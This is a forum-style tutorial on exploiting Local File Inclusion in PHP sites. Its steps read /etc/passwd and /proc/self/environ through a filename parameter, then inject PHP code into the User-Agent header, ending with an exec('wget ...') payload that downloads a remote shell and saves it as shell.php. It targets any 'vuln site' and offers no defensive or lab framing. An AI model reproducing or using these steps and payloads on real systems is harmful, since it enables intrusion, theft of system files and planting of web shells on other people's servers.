Local File Inclusion
Requirments
- Vuln site.
- Tamper data. - https://addons.mozilla.org/sv-se/firefox...mper-data/
- HackBar - https://addons.mozilla.org/en-us/firefox/addon/hackbar/
First of all, check if the site got a vulnerabillity against
Quote:etc/passwdTo do that.
Quote:http://www.site.com/index.php?filename=2Change the number '2' to
Quote:etc/passwdand it will look like this:
Quote:http://www.site.com/index.php?filename=etc/passwdIf it works, it will pop up some type of a code.
It will look like this
Spoiler (Click to View)
Do the same but change to 'Etc/passwd' to
Quote:/proc/self/environ
If it works and the file exist, you'll get something similar but not the same code.
Let's open temper data. To do that press F10 and do as I did here.
![[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]](http://gyazo.com/3cc30c8dcfa268c457726ec0ec417f93.png)
Now when you have temper data up, it would look similar to this.
Spoiler (Click to View)
Click the button 'Start temper' In the top left corner.
![[Image: 853ba2956894a57438d3b8c1dffe0698.png]](http://gyazo.com/853ba2956894a57438d3b8c1dffe0698.png)
When the Tamper is done, you would see a window like this.
![[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]](http://gyazo.com/76fce75d5c9b019cab1f21f7f7993bba.png)
Change your 'User-Agent' to
Quote:<?php phpinfo();?>Now refresh your site.
And this is how it would look like.
Spoiler (Click to View)
Now let us upload out shell.
Start up the Tamper-Data, then click star tamper and go to the 'User-Agent' again.
Type this into the 'User agent field'
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php
And you would locate your uploaded shell.
.
Post a Comment